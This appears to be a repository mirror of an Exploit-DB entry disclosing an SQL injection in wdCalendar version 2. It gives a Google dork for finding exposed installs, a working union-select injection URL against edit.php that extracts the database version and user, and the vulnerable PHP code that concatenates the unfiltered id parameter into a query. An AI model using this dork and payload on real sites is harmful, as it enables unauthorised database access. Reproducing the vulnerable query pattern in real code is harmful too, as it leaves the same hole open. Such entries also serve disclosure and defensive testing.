bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40364.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
906 B
Text
Raw Blame History

# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps
* Affected file -> edit.php and edit.db.php
* Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
* Vulnerable code:
function getCalendarByRange($id){
try{
$db = new DBConnection();
$db->getConnection();
$sql = "select * from `jqcalendar` where `id` = " . $id; //the
variable is not filtered properly
$handle = mysql_query($sql);
//echo $sql;
$row = mysql_fetch_object($handle);
}catch(Exception $e){
}
return $row;
}
if($_GET["id"]){
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly
Reference in a new issue View git blame Copy permalink